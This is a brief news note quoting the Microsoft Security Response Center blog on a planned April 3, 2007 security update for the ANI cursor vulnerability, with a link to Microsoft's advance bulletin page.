The Microsoft Security Response Center blog reports that they "have been working around the clock to test this update and are currently planning to release the security update that addresses this (ANI) issue on Tuesday April 3, 2007."
This is further supported here: www.microsoft.com/technet/security/bulletin/advance.mspx